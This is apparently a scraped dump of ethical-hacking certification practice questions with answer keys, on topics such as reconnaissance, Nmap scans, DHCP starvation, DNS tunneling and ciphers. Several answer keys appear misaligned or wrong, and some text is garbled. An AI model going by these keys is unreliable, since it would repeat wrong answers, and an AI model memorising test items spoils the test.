Suggestion:

The correct answer(s): A

Hackers often raise the trust level of a phishing message by


modeling the email to look similar to the internal email used
by the target company. This includes using logos, formatting,
and names of the target company. The phishing message will
often use the name of the company CEO, President, or
Managers. The time a hacker spends performing research to
locate this information about a company is known as?

A. Exploration

B. Investigation

C. Reconnaissance

D. Enumeration

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

The security team of Debry Inc. decided to upgrade Wi-Fi


security to thwart attacks such as dictionary attacks and key
recovery attacks. For this purpose, the security team started
implementing cutting-edge technology that uses a modern
key establishment protocol called the simultaneous
authentication of equals (SAE), also known as dragonfly key
exchange, which replaces the PSK concept. What is the Wi-Fi
encryption technology implemented by Debry Inc.?

A. WEP

B. WPA

C. WPA2

D. WPA3

Answer Mark and next Verify


Suggestion:

The correct answer(s): C

When conducting a penetration test, it is crucial to use all


means to get all available information about the target
network. One of the ways to do that is by sniffing the
network. Which of the following cannot be performed by the
passive network sniffing?

A. Identifying operating systems, services, protocols and devices

B. Modifying and replaying captured network traffic

C. Collecting unencrypted information about usernames and


passwords

D. Capturing a network traffic for further analysis

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

An incident investigator asks to receive a copy of the event


logs from all firewalls, proxy servers, and Intrusion Detection
Systems (IDS) on the network of an organization that has
experienced a possible breach of security. When the
investigator attempts to correlate the information in all of the
logs, the sequence of many of the logged events do not match
up.
What is the most likely cause?

A. The network devices are not all synchronized.

B. Proper chain of custody was not observed while collecting the logs.

C. The attacker altered or erased events from the logs.

D. The security breach was a false positive.

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

Many network and system administrators don't pay enough attention


to system clock accuracy and time synchronization. Computer clocks
can run faster or slower over time, batteries and power sources die,
or daylight-saving time changes are forgotten. Sure, there are many
more pressing security issues to deal with, but not ensuring that the
time on network devices is synchronized can cause problems. And
these problems often only come to light after a security incident. If
you suspect a hacker is accessing your network, for example, you will
want to analyze your log files to look for any suspicious activity. If
your network's security devices do not have synchronized times, the
timestamps' inaccuracy makes it impossible to correlate log files from
different sources. Not only will you have difficulty in tracking events,
but you will also find it difficult to use such evidence in court; you
won't be able to illustrate a smooth progression of events as they
occurred throughout your network.

While performing an Nmap scan against a host, Paola


determines the existence of a firewall. In an attempt to
determine whether the firewall is stateful or stateless, which
of the following options would be best to use?

A. -sA

B. -sX

C. -sT

D. -sF

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

**********************************************************************
****

Joe works as an it administrator in an organization and has


recently set up a cloud computing service for the
organization. To implement this service, he reached out to a
telecom company for providing Internet connectivity and
transport services between the organization and the cloud
service provider, in the NIST cloud deployment reference
architecture, under which category does the telecom company
fall in the above scenario?

A. Cloud booker

B. Cloud consumer
C. Cloud carrier

D. Cloud auditor

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

Mike, a security engineer, was recently hired by BigFox Ltd.


The company recently experienced disastrous DoS attacks.
The management had instructed Mike to build defensive
strategies for the company's IT infrastructure to thwart
DoS/DDoS attacks. Mike deployed some countermeasures to
handle jamming and scrambling attacks. What is the
countermeasure Mike applied to defend against jamming and
scrambling attacks?

A. Allow the usage of functions such as gets and strcpy

B. Allow the transmission of all types of addressed packets at the ISP


level

C. Implement cognitive radios in the physical layer

D. A Disable TCP SYN cookie protection

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Tony is a penetration tester tasked with performing a


penetration test. After gaining initial access to a target
system, he finds a list of hashed passwords.
Which of the following tools would not be useful for cracking
the hashed passwords?

A. John the Ripper

B. Hashcat

C. netcat

D. THC-Hydra

Answer Mark and next Verify


Suggestion:

The correct answer(s): A

While examining audit logs, you discover that people are able
to telnet into the SMTP server on port 25. You would like to
block this, though you do not see any evidence of an attack or
other wrong doing. However, you are concerned about
affecting the normal functionality of the email server. From
the following options choose how best you can achieve this
objective?

A. Block port 25 at the firewall

B. Shut off the SMTP service on the server

C. Force all connections to use a username and password

D. Switch from Windows Exchange to UNIX Sendmail.

E. None of the above.

Answer Mark and next Verify

Suggestion:

The correct answer(s): E

A friend of yours tells you that he downloaded and executed a


file that was sent to him by a coworker. Since the file did
nothing when executed, he asks you for help because he
suspects that he may have installed a trojan on his computer.
what tests would you perform to determine whether his
computer Is Infected?

A. Use ExifTool and check for malicious content.

B. You do not check; rather, you immediately restore a previous


snapshot of the operating system.

C. Upload the file to VirusTotal.

D. Use netstat and check for outgoing connections to strange IP


addresses or domains.

Answer Mark and next Verify

Suggestion:

The correct answer(s): D


Stephen, an attacker, targeted the industrial control systems
of an organization. He generated a fraudulent email with a
malicious attachment and sent it to employees of the target
organization. An employee who manages the sales software
of the operational plant opened the fraudulent email and
clicked on the malicious attachment. This resulted in the
malicious attachment being downloaded and malware being
injected into the sales software maintained in the victim's
system. Further, the malware propagated itself to other
networked systems, finally damaging the industrial
automation components. What is the attack technique used
by Stephen to damage the industrial systems?

A. Spear-phishing attack

B. SMishing attack

C. Reconnaissance attack

D. HMI-based attack

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

Boney, a professional hacker, targets an organization for


financial benefits. He performs an attack by sending his
session ID using an MITM attack technique. Boney first
obtains a valid session ID by logging into a service and later
feeds the same session 10 to the target employee. The
session ID links the target employee to Boneys account page
without disclosing any information to the victim. When the
target employee clicks on the link, all the sensitive payment
details entered in a form are linked to Boneys account. What
is the attack performed by Boney in the above scenario?

A. Session donation attack

B. Session fixation attack

C. Forbidden attack

D. CRIME attack

Answer Mark and next Verify


Suggestion:

The correct answer(s): A

To create a botnet. the attacker can use several techniques to


scan vulnerable machines. The attacker first collects
Information about a large number of vulnerable machines to
create a list. Subsequently, they infect the machines. The list
Is divided by assigning half of the list to the newly
compromised machines. The scanning process runs
simultaneously. This technique ensures the spreading and
installation of malicious code in little time.
Which technique is discussed here?

A. Hit-list-scanning technique

B. Topological scanning technique

C. Subnet scanning technique

D. Permutation scanning technique

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

Harper, a software engineer, is developing an email


application. To ensure the confidentiality of email messages.
Harper uses a symmetric-key block cipher having a classical
12- or 16-round Feistel network with a block size of 64 bits for
encryption, which includes large 8 x 32-bit S-boxes (S1, S2,
S3, S4) based on bent functions, modular addition and
subtraction, key-dependent rotation, and XOR operations.
This cipher also uses a masking key(Km1)and a rotation key
(Kr1) for performing its functions. What is the algorithm
employed by Harper to secure the email messages?

A. CAST-128

B. AES

C. GOST block cipher

D. DES

Answer Mark and next Verify

Suggestion:
The correct answer(s): A

Which of the following statements is FALSE with respect to


Intrusion Detection Systems?

A. Intrusion Detection Systems can be configured to distinguish


specific content in network packets

B. Intrusion Detection Systems can easily distinguish a malicious


payload in an encrypted traffic

C. Intrusion Detection Systems require constant update of the


signature library

D. Intrusion Detection Systems can examine the contents of the data


n context of the network protocol

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Susan, a software developer, wants her web API to update


other applications with the latest information. For this
purpose, she uses a user-defined HTTP tailback or push APIs
that are raised based on trigger events: when invoked, this
feature supplies data to other applications so that users can
instantly receive real-time Information.
Which of the following techniques is employed by Susan?

A. web shells

B. Webhooks

C. REST API

D. SOAP API

Answer Mark and next Verify

Suggestion:

The correct answer(s): B


in this form of encryption algorithm, every Individual block
contains 64-bit data, and three keys are used, where each key
consists of 56 bits. Which is this encryption algorithm?

A. IDEA

B. Triple Data Encryption standard

C. MDS encryption algorithm

D. AES

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

A network admin contacts you. He is concerned that ARP


spoofing or poisoning might occur on his network. What are
some things he can do to prevent it? Select the best answers.

A. Use port security on his switches.

B. Use a tool like ARPwatch to monitor for strange ARP activity

C. Use a firewall between all LAN segments.

D. If you have a small network, use static ARP entries

E. Use only static IP addresses on all PC's.

Answer Mark and next Verify

Suggestion:

The correct answer(s): A B D

There are multiple cloud deployment options depending on


how isolated a customer's resources are from those of other
customers. Shared environments share the costs and allow
each customer to enjoy lower operations expenses. One
solution Is for a customer to Join with a group of users or
organizations to share a cloud environment. What is this
cloud deployment option called?

A. Hybrid

B. Community
C. Public

D. Private

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Abel, a security professional, conducts penetration testing in


his client organization to check for any security loopholes. He
launched an attack on the DHCP servers by broadcasting
forged DHCP requests and leased all the DHCP addresses
available in the DHCP scope until the server could not issue
any more IP addresses. This led to a Dos attack, and as a
result, legitimate employees were unable to access the clients
network. Which of the following attacks did Abel perform in
the above scenario?

A. VLAN hopping

B. DHCP starvation

C. Rogue DHCP server attack

D. STP attack

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

DHCP snooping is a great solution to prevent rogue DHCP


servers on your network. Which security feature on switchers
leverages the DHCP snooping database to help prevent man-
in-the-middle attacks?

A. Spanning tree

B. Dynamic ARP Inspection (DAI)

C. Port security

D. Layer 2 Attack Prevention Protocol (LAPP)

Answer Mark and next Verify

Suggestion:
The correct answer(s): B

What ports should be blocked on the firewall to prevent


NetBIOS traffic from not coming through the firewall if your
network is comprised of Windows NT, 2000, and XP?

A. 110

B. 135

C. 139

D. 161

E. 445

F. 1024

Answer Mark and next Verify

Suggestion:

The correct answer(s): B C E

John, a professional hacker, performs a network attack on a


renowned organization and gains unauthorized access to the
target network. He remains in the network without being
detected for a long time and obtains sensitive information
without sabotaging the organization. Which of the following
attack techniques is used by John?

A. Advanced persistent theft

B. threat Diversion theft

C. Spear-phishing sites

D. insider threat

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

Which DNS resource record can indicate how long any "DNS
poisoning" could last?

A. MX
B. SOA

C. NS

D. TIMEOUT

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Tremp is an IT Security Manager, and he is planning to deploy


an IDS in his small company. He is looking for an IDS with the
following characteristics: - Verifies success or failure of an
attack - Monitors system activities Detects attacks that a
network-based IDS fails to detect - Near real-time detection
and response - Does not require additional hardware - Lower
entry cost Which type of IDS is best suited for Tremp's
requirements?

A. Gateway-based IDS

B. Network-based IDS

C. Host-based IDS

D. Open source-based

Answer Mark and next Verify

Suggestion:

The correct answer(s): CS

Dorian Is sending a digitally signed email to Polly, with which


key is Dorian signing this message and how is Poly validating
It?

A. Dorian is signing the message with his public key. and Poly will
verify that the message came from Dorian by using Dorian's private
key.

B. Dorian Is signing the message with Polys public key. and Poly will
verify that the message came from Dorian by using Dorian's public
key.
C. Dorian is signing the message with his private key. and Poly will
verify that the message came from Dorian by using Dorian's public
key.

D. Dorian is signing the message with Polys private key. and Poly will
verify mat the message came from Dorian by using Dorian's public
key.

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

John, a professional hacker, decided to use DNS to perform


data exfiltration on a target network, in this process, he
embedded malicious data into the DNS protocol packets that
even DNSSEC cannot detect. Using this technique. John
successfully injected malware to bypass a firewall and
maintained communication with the victim machine and C&C
server. What is the technique employed by John to bypass the
firewall?

A. DNS cache snooping

B. DNSSEC zone walking

C. DNS tunneling method

D. DNS enumeration

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

Jack, a professional hacker, targets an organization and


performs vulnerability scanning on the target web server to
identify any possible weaknesses, vulnerabilities, and
misconfigurations. In this process, Jack uses an automated
tool that eases his work and performs vulnerability scanning
to find hosts, services, and other vulnerabilities in the target
server. Which of the following tools is used by Jack to perform
vulnerability scanning?

A. Infoga
B. WebCopier Pro

C. Netsparker

D. NCollector Studio

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

infecting a system with malware and using phishing to gain


credentials to a system or web application are examples of
which phase of the ethical hacking methodology?

A. Reconnaissance

B. Maintaining access

C. Scanning

D. Gaining access

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Which of the following tools performs comprehensive tests


against web servers, including dangerous files and CGIs?

A. Nikto

B. John the Ripper

C. Dsniff

D. Snort

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

What is the known plaintext attack used against DES which


gives the result that encrypting plaintext with one DES key
followed by encrypting it with a second DES key is no more
secure than using a single key?

A. Man-in-the-middle attack

B. Meet-in-the-middle attack

C. Replay attack

D. Traffic analysis attack

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

What is the first step for a hacker conducting a DNS cache


poisoning (DNS spoofing) attack against an organization?

A. The attacker queries a nameserver using the DNS resolver.

B. The attacker makes a request to the DNS resolver.

C. The attacker forges a reply from the DNS resolver.

D. The attacker uses TCP to poison the ONS resofver.

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Which of the following Bluetooth hacking techniques does an


attacker use to send messages to users without the
recipient’s consent, similar to email spamming?

A. Bluesmacking

B. BlueSniffing

C. Bluejacking

D. Bluesnarfing

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

(https://en.wikipedia.org/wiki/Bluejacking) Bluejacking is the sending


of unsolicited messages over Bluetooth to Bluetooth-enabled devices
such as mobile phones, PDAs or laptop computers, sending a vCard
which typically contains a message in the name field (i.e., for
bluedating or bluechat) to another Bluetooth-enabled device via the
OBEX protocol. Bluejacking is usually harmless, but because
bluejacked people generally don't know what has happened, they
may think that their phone is malfunctioning. Usually, a bluejacker will
only send a text message, but with modern phones it's possible to
send images or sounds as well. Bluejacking has been used in guerrilla
marketing campaigns to promote advergames. Bluejacking is also
confused with Bluesnarfing, which is the way in which mobile phones
are illegally hacked via Bluetooth.

When a security analyst prepares for the formal security


assessment - what of the following should be done in order to
determine inconsistencies in the secure assets database and
verify that system is compliant to the minimum security
baseline?

A. Data items and vulnerability scanning

B. Interviewing employees and network engineers

C. Reviewing the firewalls configuration

D. Source code review

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

What type of a vulnerability/attack is it when the malicious


person forces the user’s browser to send an authenticated
request to a server?

A. Session hijacking

B. Server side request forgery

C. Cross-site request forgery

D. Cross-site scripting

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

Robin, un hacker profesional, apuntó a la red de una


organización para rastrear todo el tráfico. Durante este
proceso,
Robin conectó un conmutador no autorizado a un puerto no
utilizado en la LAN con una prioridad menor que la de
cualquier otro conmutador en la red para poder convertirlo en
un puente raíz que más tarde le permitiría rastrear todo el
tráfico en la red. ¿Cuál es el ataque realizado por Robin en el
escenario anterior?

A. Ataque de suplantación de ARP

B. Ataque de salto de VLAN

C. Ataque de envenenamiento de DNS

D. Ataque STP

Respuesta Marcar y seguir Verificar

Sugerencia:

La(s) respuesta(s) correcta(s): D

You might also like